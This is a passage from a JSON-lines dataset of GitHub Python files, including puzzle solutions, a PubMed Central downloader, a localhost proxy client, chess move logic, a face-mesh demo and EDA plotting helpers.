+= '0'\n\t\tmax_number += '9'\n\tstart_number = ''\n\tfor l in range(int(number_string) , int(max_number) + 1 ) :\n\t\tif l % m == 0 :\n\t\t\tstart_number = str(l)\n\t\t\tbreak;\n\tprohibited = []\n\tfor l in range(x):\n\t\ta,b = input().split()\n\t\tprohibited.append(a+b)\n\t\tprohibited.append(b+a)\n\n\t# print (prohibited)\n\tanswer = 0\n\tfor l in range(int(start_number),int(max_number) + 1, m) :\n\t\tflag = 0\n\t\tfor i in range(len(prohibited)) :\n\t\t\tif (re.search(prohibited[i],str(l))) :\n\t\t\t\tflag = 1\n\t\t\t\tbreak\n\t\tif flag == 0 :\n\t\t\tanswer += 1\n\t\t\tanswer = answer % 1000000007\n\n\tprint (answer)\n\n\t\t\n\n\n\n","repo_name":"msrshahrukh100/Iqra","sub_path":"GFG/madstreet2.py","file_name":"madstreet2.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"1683693700","text":"from config.config import *\r\nfrom utils.utils import *\r\n\r\n\r\nclass Game:\r\n def __init__(self, sess, avp_net, vsp_net):\r\n self.avp_net = avp_net\r\n self.vsp_net = vsp_net\r\n self.max_depth = FLAGS.max_depth\r\n self.action_num = FLAGS.action_num\r\n self.sess = sess\r\n self.saver = tf.train.Saver()\r\n # initialize the network\r\n self.sess.run(tf.global_variables_initializer())\r\n\r\n def get_game_ended(self, level, img):\r\n if level != self.max_depth:\r\n return 0\r\n else:\r\n _, v = self.avp_net.predict(img)\r\n return v\r\n\r\n def get_next_state(self, s, a):\r\n\r\n return self.vsp_net.predict(s, a)\r\n\r\n @staticmethod\r\n def format_steer_angle(w):\r\n w = int((w + 1) / 0.2)\r\n if w == 10:\r\n w = 9\r\n return w\r\n\r\n def train_net(self, train_examples):\r\n train_times = int(FLAGS.train_interval / FLAGS.vsp_batch_size)\r\n # train avp and vsp network\r\n for _ in range(train_times):\r\n sample_index = np.random.choice(FLAGS.train_interval - 1, FLAGS.avp_batch_size)\r\n state_batch = []\r\n next_state_batch = []\r\n a_batch = []\r\n\r\n obs_batch = []\r\n p_batch = []\r\n v_batch = []\r\n for i in range(FLAGS.avp_batch_size):\r\n # coach.last_state, coach.last_pi, r, coach.last_a\r\n obs_batch.append(train_examples[sample_index[i]][0])\r\n p_batch.append(train_examples[sample_index[i]][1])\r\n next_state = train_examples[sample_index[i] + 1][0]\r\n _, tmp_v = self.avp_net.predict(next_state)\r\n v_batch.append(train_examples[sample_index[i]][2]+FLAGS.gmma*tmp_v)\r\n\r\n state_batch.append(train_examples[sample_index[i]][0])\r\n tmp = np.zeros((1,))\r\n tmp[0] = train_examples[sample_index[i]][-1]\r\n a_batch.append(tmp)\r\n next_state_batch.append(train_examples[sample_index[i] + 1][0])\r\n\r\n loss_vsp = self.vsp_net.learn(state_batch, a_batch, next_state_batch)\r\n loss_avp = self.avp_net.learn(p_batch, v_batch, obs_batch)\r\n print('loss_vsp:', round(loss_vsp, 5), 'loss_avp:', round(loss_avp, 5))\r\n\r\n def save_ckpt(self):\r\n self.saver.save(self.sess, 'ckpt/model.ckpt')\r\n","repo_name":"winds-line/deep-MCTS","sub_path":"game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"50"} +{"seq_id":"6651653031","text":"import discord\r\nimport re\r\n\r\n\r\ndef format_display_name(display_name: str, illegal_strings=('👉', '👑', ':crown:', ':point_right:')):\r\n formatted = display_name[:20]\r\n if len(display_name) > 20:\r\n formatted += '...'\r\n for illegal_string in illegal_strings:\r\n formatted = formatted.replace(illegal_string, '💩')\r\n return 
formatted\r\n\r\n\r\ndef get_score_user_info(user, score_pos: int):\r\n formatted_name = format_display_name(user[\"display_name\"])\r\n points = int(user[\"challenges_solved\"]) * 10\r\n ret_str = f'#{score_pos+1} {formatted_name} - {points} poeng'\r\n\r\n if user[\"eggs_solved\"] == \"0\":\r\n ret_str += '\\n'\r\n else:\r\n ret_str += f' og ⭐ x {user[\"eggs_solved\"]}\\n'\r\n \r\n return ret_str\r\n\r\n\r\ndef get_max_score_users(score):\r\n highest_score = [score[0][\"challenges_solved\"], score[0][\"eggs_solved\"]]\r\n\r\n for x, user in enumerate(score):\r\n user_score = [user[\"challenges_solved\"], user[\"eggs_solved\"]]\r\n if user_score != highest_score:\r\n return x\r\n\r\n\r\nasync def get_scoreboard_embed(scoreboard, input_users=()):\r\n if scoreboard is None:\r\n return discord.Embed(\r\n title=\"FEIL\",\r\n color=0xff0000,\r\n description=\"Det oppsto en feil!\\nKlarte ikke å hente scoreboardet.\"\r\n )\r\n\r\n embed_description = \"\"\r\n embed_finished = False\r\n scoreboard_users = 0\r\n for x, user in enumerate(scoreboard):\r\n if len(input_users) > 0:\r\n for input_user in input_users:\r\n if input_user.lower() in user['display_name'].lower():\r\n embed_description += get_score_user_info(user, x)\r\n scoreboard_users += 1\r\n if scoreboard_users >= 15:\r\n embed_description += '...'\r\n embed_finished = True\r\n break\r\n else:\r\n scoreboard_users += 1\r\n embed_description += get_score_user_info(user, x)\r\n if scoreboard_users >= 15:\r\n max_score_users = get_max_score_users(scoreboard)\r\n embed_description += f'...\\n\\n{max_score_users}/{len(scoreboard)} alvebetjenter har maks poeng'\r\n\r\n embed_finished = True\r\n\r\n if embed_finished:\r\n break\r\n\r\n if embed_description == '':\r\n return discord.Embed(title='FEIL', color=0x50bdfe, description='Brukeren ble ikke funnet!')\r\n\r\n return discord.Embed(title='Poengoversikt', color=0x50bdfe, description=embed_description)\r\n\r\n\r\ndef render_mail(mail):\r\n message_content = f\"~~{' ' * 200}~~\\n\"\r\n message_content += f\"Sent: [{mail['sent']}]\\n\"\r\n message_content += f\"From: [{mail['from']}]\\n\"\r\n message_content += f\"To: [{', '.join([to.replace('{{display_name}}', 'YOU') for to in mail['to']])}]\\n\"\r\n message_content += f\"Subject: {mail['subject']}\\n\"\r\n mail_content = mail['content']\r\n for result in re.finditer(r'(\\[.*\\]\\((.*)\\))', mail_content):\r\n mail_content = mail_content.replace(result.groups(0)[0], f\"https://dass.npst.no{result.groups(0)[1]}\")\r\n message_content += mail_content\r\n return message_content\r\n","repo_name":"jotjern/DASS-Betjent","sub_path":"NPST_utils.py","file_name":"NPST_utils.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"13902031474","text":"import os\nimport sys\nimport cv2\nimport random \nimport pathlib\nimport numpy as np\n\nif __name__ == '__main__':\n # loop through objects\n obstacle_arr=[]\n dirs = os.listdir('objects')\n for x in dirs:\n if str(os.path.splitext(x)[1]) == \".jpg\":\n obstacle_arr.append(x)\n\n for obstacle_src in obstacle_arr:\n # open url with opencv\n bg = cv2.imread('game-snapshots/full_snap__bg.jpg')\n obstacle = cv2.imread('objects/'+obstacle_src)\n bg_width, bg_height, _ = bg.shape\n obstacle_width, obstacle_height, _ = obstacle.shape\n\n for i in range(1,1000):\n # random coordinates\n x=random.randint(0, bg_width-obstacle_width-50)\n y=random.randint(0, bg_height-obstacle_height-50)\n while 
x+obstacle_width+50>bg_width or y+obstacle_height+50>bg_height:\n x=random.randint(0, bg_width-obstacle_width-50)\n\n try:\n # img size 76x103\n img_crop=bg[x:x+obstacle_width+50, y:y+obstacle_height+50]\n\n obstacle_name=str(os.path.splitext(obstacle_src)[0])\n savepath='neg-'+obstacle_name + \"/bg-\" + obstacle_name + \"-\" + str(i) + \".jpg\"\n\n # check if folder exists\n obstacle_directory = pathlib.Path('objects/neg-'+obstacle_name)\n if obstacle_directory.exists()==False:\n os.mkdir('objects/neg-'+obstacle_name)\n\n # save background\n cv2.imwrite('objects/'+savepath, img_crop)\n with open('objects/'+obstacle_name+'.txt', 'a') as f:\n f.write(savepath+'\\n')\n print(savepath)\n except Exception as e:\n print(str(e))","repo_name":"agustinustheo/gojek-game-ann","sub_path":"background_generate_script.py","file_name":"background_generate_script.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"12407739159","text":"Q = int(input())\nqueries = [list(input().split()) for i in range(Q)]\nS = \"\"\n# print(queries)\nfor q in queries:\n if q[0] == \"1\":\n input_str = str(q[1])\n S += input_str * int(q[2])\n else:\n slice_int = int(q[1])\n deleteS = S[:slice_int]\n S = S[slice_int:]\n delDict = {}\n for x in range(len(deleteS)):\n delDict[deleteS[x]] = 0\n for x in range(len(deleteS)):\n delDict[deleteS[x]] += 1\n delSum = 0\n for v in delDict.values():\n delSum += v**2\n print(delSum)\n","repo_name":"ritzcr/AtCoder","sub_path":"past2/g.py","file_name":"g.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"9351304674","text":"#!/usr/bin/env python3\nimport queue\nimport threading\nimport urllib.request as urlr\nimport xml.etree.ElementTree as etree\nimport PubMedDB\nimport argparse\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nimport os\n\nFUNCTION = '''\nDownload free full text from PMC.\n'''\nINFO = '''Copyright wzlnot@gmail.com All Rights Reserved. 
\\\nLicensed under the MIT License'''\nTRYTIMES = 10\n\n\ndef cbk(a, b, c):\n per = 100.0 * a * b / c\n if per > 100:\n per = 100\n print('%.2f%%' % per)\n\n\ndef query_pmcid(DBSession):\n query_session = DBSession()\n pmcids = [str(i[0]) for i in query_session.query(\n PubMedDB.PM_to_PMC.pmcid).all()]\n query_session.close\n return pmcids\n\n\nclass downloader(object):\n def __init__(self, pmcid, store_path):\n self.pmcid = pmcid\n self.store_path = store_path\n\n def work(self):\n # url: https://www.ncbi.nlm.nih.gov/pmc/utils/oa/oa.fcgi?id=PMC13901\n baseurl = 'https://www.ncbi.nlm.nih.gov/pmc/utils/oa/oa.fcgi?id='\n resp = urlr.urlopen(baseurl + self.pmcid).read().decode(\n 'utf-8', errors='ignore')\n tree = etree.fromstring(resp)\n try:\n durl = tree[2][0][0].attrib['href']\n urlr.urlretrieve(\n durl, self.store_path + '/{0}.tar.gz'.format(self.pmcid))\n print(\"Download: {0} finished\".format(self.pmcid))\n except:\n print('{0} not in NCBI oa_package'.format(self.pmcid))\n\n\nclass downloadTASK(threading.Thread):\n def __init__(self, myqueue):\n self.queue = myqueue\n super(downloadTASK, self).__init__()\n\n def run(self):\n while True:\n if self.queue.qsize() > 0:\n self.queue.get().work()\n else:\n break\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=FUNCTION, epilog=INFO,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument('-d', '--database', type=str,\n help='postgrel database', required=True)\n parser.add_argument('-P', '--PATH', type=str, required=True,\n help='PATH to store the full text')\n parser.add_argument('-p', '--process', type=int, default=4,\n help='thread number')\n args = parser.parse_args()\n return args\n\nif __name__ == '__main__':\n args = parse_args()\n if not os.path.exists(args.PATH):\n os.mkdir(args.PATH)\n db = args.database\n engine = create_engine('postgresql://parser:parser@localhost/' + db)\n DBSession = sessionmaker(bind=engine)\n myqueue = queue.Queue(0)\n for i in query_pmcid(DBSession):\n s_download = downloader(i, args.PATH)\n myqueue.put_nowait(s_download)\n threads = []\n for i in range(args.process):\n thread = downloadTASK(myqueue)\n# thread.start()\n threads.append(thread)\n for thread in threads:\n thread.start()\n for thread in threads:\n thread.join()\n","repo_name":"meng-ma-biomedical-AI/BioNLP_Gene_Mutation","sub_path":"Tools/PubMed/PMCresource.py","file_name":"PMCresource.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"37126641544","text":"import sys\nfrom pathlib import Path\npath_root = Path(__file__).parents[2]\nsys.path.append(str(path_root))\n\nfrom utils.get_inputs import ProblemParser\n\n\nlines = ProblemParser().load_input(2021, 15)\nnums = [[] for _ in range(len(lines))]\nfor i, line in enumerate(lines):\n for c in line:\n nums[i].append(int(c))\n\ndef part1():\n dp = [[0 for _ in range(len(nums[0]))] for _ in range(len(nums))]\n for i in range(len(nums[0])):\n for j in range(len(nums)):\n if i == 0 and j == 0:\n dp[i][j] = 0\n elif i-1 > 0 and j - 1 > 0:\n dp[i][j] = nums[i][j] + min(dp[i-1][j], dp[i][j-1])\n elif i-1 > 0:\n dp[i][j] = nums[i][j] + dp[i-1][j]\n else:\n dp[i][j] = nums[i][j] + dp[i][j-1]\n\n print(dp[len(nums[0]) - 1][ len(nums) - 1] - nums[0][0])\n\n\ndef expand_grid(g, n):\n expanded = []\n for bump in range(n * 2):\n temp = [[0 for _ in range(len(g[0]))] for _ in range(len(g))]\n for i in range(len(g[0])):\n for j in range(len(g)):\n val = (g[i][j] + 
(bump + 1))\n if val >= 10:\n val = val - 10 + 1\n temp[i][j] = val\n expanded.append(temp)\n app = []\n for i in range(n):\n for j in range(len(g)):\n g[j].extend(expanded[i][j])\n for i in range(n):\n curr = expanded[i: i + n + 1]\n temp = curr[0]\n for i in range(1, n + 1):\n for j in range(len(temp)):\n temp[j].extend(curr[i][j])\n app.append(temp)\n print(app)\n for a in app:\n g.extend(a)\n return g\n\n\ndef part2():\n expand_grid(nums, 4)\n for num in nums:\n print(num)\n dp = [[0 for _ in range(len(nums[0]))] for _ in range(len(nums))]\n for i in range(len(nums[0])):\n for j in range(len(nums)):\n if i == 0 and j == 0:\n dp[i][j] = 0\n elif i-1 > 0 and j - 1 > 0:\n dp[i][j] = nums[i][j] + min(dp[i-1][j], dp[i][j-1])\n elif i-1 > 0:\n dp[i][j] = nums[i][j] + dp[i-1][j]\n else:\n dp[i][j] = nums[i][j] + dp[i][j-1]\n\n print(dp[len(nums[0]) - 1][ len(nums) - 1] - nums[0][0])\npart1()\npart2()","repo_name":"kendallm/advent-of-code","sub_path":"2021/solutions/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"9041266035","text":"class Solution(object):\n def numSquares(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n def helper(n, dp):\n i = int(n ** 0.5)\n res = float('inf')\n while i > 0:\n res = min(dp[n - (i * i)] + 1, res)\n i -= 1\n return res\n\n dp = [0, 1]\n for i in range(2, n + 1):\n dp.append(helper(i, dp))\n return dp[n]\n \n def sample(self, n):\n dp = [0]\n perfectSq = [pow(i,2) for i in range(1, int(sqrt(n))+1)]\n while len(dp) < n+1:\n dpI = inf\n for ps in perfectSq:\n if len(dp) startY:\n step = 1\n else:\n step = -1\n for i in range(startY+step, endY, step):\n line.append(strC(i, startX))\n\n # straight Y axis\n elif startY == endY:\n if endX > startX:\n step = 1\n else: \n step = -1\n for i in range(startX+step, endX, step):\n line.append(strC(startY, i))\n\n # diagonal \n\n elif abs(startX - endX) == abs(startY - endY):\n \n if endX > startX:\n stepX = 1\n else:\n stepX = -1\n if endY > startY:\n stepY = 1\n else:\n stepY = -1\n\n for i in range(startX+stepX, endX, stepX):\n startY += stepY\n line.append(strC(startY, i))\n\n\n return line\n\ndef isPinned(piece,turn,board):\n pieceX = int(piece[1])\n pieceY = int(piece[0])\n pieceName = board[pieceY][pieceX]\n availableMoves = []\n isPiecePinned = False\n if pieceName.lower() != 'k':\n\n # i will get the attackers on the king, then remove the piece and compare, does the attackers add? 
if yes that means it should be pinned\n        oisCheck, okingMoves, okingCords, oattackerPieces= isKingOnCheck(board, turn)\n\n        board[pieceY][pieceX] = ''\n\n        nisCheck, nkingMoves, nkingCords, nattackerPieces = isKingOnCheck(board, turn)\n\n        board[pieceY][pieceX] = pieceName\n\n        if len(oattackerPieces) ==len( nattackerPieces):\n            availableMoves = None\n        else:\n            pinner = list(set(nattackerPieces) - set(oattackerPieces))[0][1]\n            pinner = strC(pinner[0],pinner[1])\n            pieceMoves = getLegalMoves(piece, board)\n            line = getLine(piece, pinner)\n            line.append(pinner)\n            for move in pieceMoves:\n                if move in line:\n                    availableMoves.append(move)\n            isPiecePinned = True\n    return availableMoves\n\n\ndef isCheckmated(color,attackerPieces,board,kingCords):\n    checkMate = True\n    if len(attackerPieces) > 1:\n        checkMate = True\n    friendlyPieces = []\n    for row in range(8):\n        for col in range(8):\n            if sameColor(color, board[row][col]):\n                friendlyPieces.append((board[row][col],strC(row,col)))\n    \n    for piece in friendlyPieces:\n\n        moves = getOutOfCheck(piece[1], attackerPieces, board, kingCords)\n        if moves != []:\n            checkMate = False\n            break\n    return checkMate\n\ndef isStaleMate (color,board):\n    staleMate = True\n    friendlyPieces = []\n    for row in range(8):\n        for col in range(8):\n            if sameColor(color, board[row][col]):\n                friendlyPieces.append((board[row][col],strC(row,col)))\n\n    for piece in friendlyPieces:\n        if piece[0].lower() == 'k':\n            continue\n        moves = getLegalMoves(piece[1], board)\n        if moves !=[]:\n            staleMate = False\n            break\n    return staleMate\n\ndef isDraw(board,color):\n    friendlyPieces = []\n    opponentPieces = []\n    for row in range(8):\n        for col in range(8):\n            if sameColor(color, board[row][col]):\n                friendlyPieces.append((board[row][col],strC(row,col)))\n            if oppositeColor(color, board[row][col]):\n                opponentPieces.append((board[row][col],strC(row,col)))\n\n\n    if len(friendlyPieces) == 1 and len(opponentPieces)== 1:\n        return True\n    friendlyStatus = False\n    if len(friendlyPieces) == 2 :\n        if len(opponentPieces) ==2:\n            for piece in friendlyPieces:\n                if 'n' == piece[0].lower() or 'b' == piece[0].lower():\n                    friendlyStatus = True\n            if friendlyStatus:\n                for piece in opponentPieces:\n                    if 'n' == piece[0].lower() or 'b' == piece[0].lower():\n                        return True\n        if len(opponentPieces) == 1:\n            for piece in friendlyPieces:\n                if 'n' == piece[0].lower() or 'b' == piece[0].lower():\n                    return True \n    if len(friendlyPieces) == 1 and len(opponentPieces) == 2:\n        for piece in opponentPieces:\n            if 'n' == piece[0].lower() or 'b' == piece[0].lower():\n                return True \n","repo_name":"sohyp3/chessGame","sub_path":"game/checkCheck.py","file_name":"checkCheck.py","file_ext":"py","file_size_in_byte":6597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"}
+{"seq_id":"27338342060","text":"import os\nimport cv2\nimport argparse\n\nfrom medface3D.face_mesh_reconstruction import FaceMeshGenerator\nfrom utils.visualize import save_images_as_gif, get_depth_map\nfrom utils.render_mesh import render_mesh, render_rotate_mesh\nfrom utils.transform import get_3D_point_cloud\n\ndef main():\n    # Parse command-line arguments\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-f', '--folder', default='data/sample' , help='path to sample folder image')\n    parser.add_argument('-l', '--max_loop', type=int, default= 2, help='max loop to reconstruct 3D face mesh')\n    parser.add_argument('-p', '--point_cloud', action=\"store_true\", default=True, help='get image result as point cloud')\n    parser.add_argument('-d', '--depth_scale', 
action=\"store_true\", default=False, help='depth scale for depth value')\n\n\n args = parser.parse_args()\n\n files = os.listdir(args.folder) \n\n for _, file in enumerate(files):\n if file.split('.')[-1] not in ['jpg', 'png']:\n continue\n\n path_read = f'{args.folder}/{file}'\n image = cv2.imread(path_read)\n _, w, _ = image.shape\n\n detector = FaceMeshGenerator(max_loop = args.max_loop)\n input_image = image.copy()\n output_image, face_detected, points, depth_list, triangles = detector.generate_face_mesh(input_image, args.point_cloud, args.depth_scale)\n \n if face_detected:\n list_view = []\n list_view.append(image)\n list_view.append(output_image)\n \n depth_map = get_depth_map(input_image, points, triangles.simplices, depth_list)\n list_view.append(depth_map)\n\n point_cloud_data = get_3D_point_cloud(points, depth_list, w)\n mesh_image = render_mesh(image, point_cloud_data)\n list_view.append(mesh_image)\n \n view_face = render_rotate_mesh(image, point_cloud_data)\n list_view.extend(view_face)\n\n save_images_as_gif(list_view, f'{args.folder}/{file}_face_reconstruction.gif')\n\n else: print(f'No face detected in is image')\nif __name__ == '__main__':\n # Example usage:\n main()\n","repo_name":"nguyentrongvan/MedFace3D","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"874791948","text":"import math\n\nfrom pyquiz.common.TreeNode import TreeNode\n\n\nclass MinimalTree:\n \"\"\"\n Minimal Tree: Given a sorted (increasing order) array with unique integer elements,\n write an algorithm to create a binary search tree with minimal height.\n Solution: use idea find a median, it is a root node. Repeat recursively for left/right parts\n \"\"\"\n\n def create_bst(self, items: []):\n return self.create_bst_part(items, 0, len(items))\n\n def create_bst_part(self, items: [], start, end):\n # Parent node will be a median of items\n im = math.floor(start + (end - start) / 2)\n node = TreeNode(items[im], None, None)\n # Recursive call to fill left/right children of BST\n if im > start:\n node.left = self.create_bst_part(items, start, im)\n if end > im + 1:\n node.right = self.create_bst_part(items, im, end)\n return node\n","repo_name":"DmitryPukhov/pyquiz","sub_path":"pyquiz/ctci/treesandgraphs/MinimalTree.py","file_name":"MinimalTree.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"42726662024","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport socket\nfrom multiprocessing import Pool\n\nHOST = \"localhost\"\nPORT = 8001\nBUFFER_SIZE = 1024\n\ndef proxyClient(address):\n host = 'www.google.com'\n port = 80\n payload = 'GET / HTTP/1.0\\r\\nHost: '+host+'\\r\\n\\r\\n'\n buffer_size = 4096\n\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect(address)\n s.sendall(payload.encode())\n s.shutdown(socket.SHUT_WR)\n\n full_data = s.recv(BUFFER_SIZE)\n print(full_data)\n except Exception as e:\n print(e)\n finally:\n s.close()\n\n\ndef main():\n address = [('127.0.0.1', 8001)]\n with Pool() as p:\n p.map(proxyClient, address * 10)\n\nif __name__ == \"__main__\":\n main()","repo_name":"TaraYu/cmput404lab2","sub_path":"multi_proxy_client.py","file_name":"multi_proxy_client.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} 
+{"seq_id":"74343652635","text":"#!/usr/bin/env python\nimport psycopg2\n\ndef stats_bibli(conn):\n choice = '1'\n choices = ['1', '2', '3']\n while choice in choices:\n print(\"\\n Statistiques sur la bibliotheque \")\n print(\"1 : Affichage age moyen des adhérents \")\n print(\"2 : Affichage de la ressource la plus populaire\")\n print(\"3 : Nombre total de prêts\")\n\n print(\"Pour sortir, entrez autre chose\")\n choice = input()\n\n if choice == '1':\n Age_moyen_adherent(conn)\n\n if choice == '2':\n Ressource_populaire(conn)\n \n if choice == '3':\n Nb_total_prets(conn)\n\ndef Age_moyen_adherent(conn):\n\n cur = conn.cursor()\n sql ='SELECT AVG(age(Utilisateur.date_naissance)) AS age_moy FROM Utilisateur'\n cur.execute(sql)\n row = cur.fetchone()\n print(\"\\n> Age moyen des adhérents :\", row[0]);\n\n\ndef Ressource_populaire(conn): #affiche la ressource la plus populaire\n\n#affichage de la liste de toutes les ressources avec leurs nombres de prets\n cur = conn.cursor()\n sql = \"SELECT id, nombre_emprunts FROM Emprunts_par_ressource\"\n cur.execute(sql)\n raw = cur.fetchone()\n id = raw[0]\n nombre_emprunts = raw[1]\n#CREATE VIEW Emprunts_par_ressource (id, nombre_emprunts) AS\n#SELECT Ressource.code, COUNT(Pret.id_pret)\n#FROM Ressource JOIN Exemplaire ON Ressource.code = Exemplaire.ressource JOIN Pret ON Exemplaire.id_pret = Pret.id_pret\n#GROUP BY (Ressource.code);\n\n#affichage du code de la ressource la plus populaire + nombre de prets\n sql = \"SELECT id, nombre_emprunts FROM Emprunts_par_ressource WHERE nombre_emprunts = (SELECT MAX(nombre_emprunts) FROM Emprunts_par_ressource)\"\n cur.execute(sql)\n row = cur.fetchone()\n id = row[0]\n nombre_emprunts = row[1]\n print(\"\\n> La ressource la plus populaire est\", id, \"avec un nombre de prets de\", nombre_emprunts);\n\n#CREATE VIEW populaire (id, nombre) AS\n#SELECT id, nombre_emprunts FROM Emprunts_par_ressource WHERE nombre_emprunts = (SELECT MAX(nombre_emprunts) FROM Emprunts_par_ressource) ;\n\n\ndef Nb_total_prets(conn): #affiche le nombre total de prets pour la bibliotheque\n cur = conn.cursor()\n sql ='SELECT COUNT(id_pret) AS nb_pret FROM Pret'\n cur.execute(sql)\n row = cur.fetchone()\n print(\"\\n> Nombre total de prets :\", row[0]);\n\n\n \n\n\n \n","repo_name":"cazicbor/Library-Manager","sub_path":"bibli.py","file_name":"bibli.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"4735334616","text":"import numpy as np\nimport pandas as pd\nimport altair as alt\nfrom sklearn.impute import SimpleImputer\nimport warnings\n\n\ndef plot_intro(df, plot_title=\"\", theme_config=\"Dimension\"):\n \"\"\"Takes a dataframe with configurations and\n returns an altair object with summary metrics.\n\n Parameters\n -----------\n df: pd.DataFrame\n Dataframe from which to take columns\n not limited to numerical columns only\n plot_title : string, optional\n User can specify the plot title, by default to show the memory usage\n theme_config : list, optional\n A list of color configurations to be passed to theme, by default to use\n Demension as config\n\n Returns\n -------\n plot : altair.Chart object\n An altair plot object displaying summary metrics including the memory\n usage and the basic description of the input data.\n\n Examples\n -------\n >>> example_df = pd.DataFrame({'animal': ['falcon',\n 'dog',\n 'spider',\n 'fish'],\n 'num_legs': [2, 4, 8, 0],\n 'num_wings': [2, 0, 0, 0],\n 'num_specimen_seen': [10, 2, 1, 8]})\n 
>>> instaeda_py.plot_intro(example_df)\n \"\"\"\n\n # Check basic information for input data\n sum_missing_columns = df.isnull().sum(axis=0)\n num_of_all_missing_columns = sum(sum_missing_columns)\n\n sum_missing_rows = df.isnull().sum(axis=1)\n num_complete_rows = df.shape[0] - sum(sum_missing_rows)\n\n # Create info dataframe\n info_df = pd.DataFrame(\n {\n \"rows\": df.shape[0],\n \"columns\": df.shape[1],\n \"numeric_columns\": len(\n list(df.select_dtypes(include=[np.number]).columns.values)\n ),\n \"all_missing_columns\": num_of_all_missing_columns,\n \"total_missing_values\": df.isnull().sum().sum(),\n \"complete_rows\": num_complete_rows,\n \"total_observations\": df.shape[0] * df.shape[1],\n \"memory_usage\": df.memory_usage(deep=True).sum(),\n },\n index=[0],\n )\n\n # Create the plotting dataframe\n plot_df = pd.DataFrame(\n {\n \"Metrics\": [\n \"Numeric Columns\",\n \"All Missing Columns\",\n \"Missing Observations\",\n \"Complete Rows\",\n ],\n \"Value\": [\n float(info_df[\"numeric_columns\"] / info_df[\"columns\"]),\n float(info_df[\"all_missing_columns\"] / info_df[\"columns\"]),\n float(info_df[\"total_missing_values\"] /\n info_df[\"total_observations\"]),\n float(info_df[\"complete_rows\"] / info_df[\"rows\"]),\n ],\n \"Dimension\": [\"column\", \"column\", \"observation\", \"row\"],\n }\n )\n\n # Create the plot\n\n # Check whether the user specifies a plotting title\n if len(plot_title) == 0:\n memory = float(info_df[\"memory_usage\"])\n plot_title = \"Memory Usage: \" + str(memory) + \"kb\"\n intro_plot = (\n alt.Chart(plot_df, title=plot_title)\n .mark_bar()\n .encode(\n alt.X(\"Value\", axis=alt.Axis(format=\"%\")),\n alt.Y(\"Metrics\"),\n color=alt.Color(theme_config),\n )\n )\n\n else:\n intro_plot = (\n alt.Chart(plot_df, title=plot_title)\n .mark_bar()\n .encode(\n alt.X(\"Value\", axis=alt.Axis(format=\"%\")),\n alt.Y(\"Metrics\"),\n color=alt.Color(theme_config),\n )\n )\n\n return intro_plot\n\n\ndef plot_corr(df, cols=None, method=\"pearson\", colour_palette=\"purpleorange\"):\n \"\"\"Takes a dataframe, subsets numeric columns and returns a correlation\n plot object.\n\n Parameters\n -----------\n df: pd.DataFrame\n Dataframe from which to take columns and calculate, plot correlation\n between columns.\n cols: list, optional\n List of columns to perform correlation on.\n By default, None (perform on all numeric).\n method : string, optional\n correlation calculation method, one of:\n {'pearson', 'kendall', 'spearman'}. 
By default 'pearson'\n colour_palette : string, optional\n one of Altair accepted colour schemes\n\n Returns\n -------\n plot : altair.Chart object\n Correlation plot object displaying column names and corresponding\n correlation values.\n\n Examples\n -------\n >>> example_df = pd.DataFrame({'animal': ['falcon',\n 'dog',\n 'spider',\n 'fish'],\n 'num_legs': [2, 4, 8, 0],\n 'num_wings': [2, 0, 0, 0],\n 'num_specimen_seen': [10, 2, 1, 8]})\n >>> instaeda_py.plot_corr(example_df)\n \"\"\"\n\n # check user input\n correlation_methods = {\"pearson\", \"kendall\", \"spearman\"}\n colour_palette_list = {\n \"blueorange\",\n \"brownbluegreen\",\n \"purplegreen\",\n \"pinkyellowgreen\",\n \"purpleorange\",\n \"redblue\",\n \"redgrey\",\n \"redyellowblue\",\n \"redyellowgreen\",\n \"spectral\",\n }\n numeric_cols = [\"int16\", \"int32\", \"int64\", \"float16\", \"float32\", \"float64\"]\n if not isinstance(df, pd.DataFrame):\n raise Exception(\"must pass in pandas DataFrame\")\n if method not in correlation_methods:\n raise Exception(\"correlation method not acceptable\")\n if colour_palette not in colour_palette_list:\n warnings.warn(\"Recommended Altair continuous diverging colour palette\")\n\n # calculate\n if cols is None:\n if df.select_dtypes(np.number).shape[1] < 2:\n raise Exception(\n \"Dataframe does not have enough numeric columns for comparison\"\n )\n df = df.select_dtypes(include=numeric_cols)\n else:\n if df[cols].select_dtypes(np.number).shape[1] < 2:\n raise Exception(\n \"Dataframe does not have enough numeric columns for comparison\"\n )\n df = df[cols].select_dtypes(include=numeric_cols)\n corr_df = (\n round(df.corr(method=method), 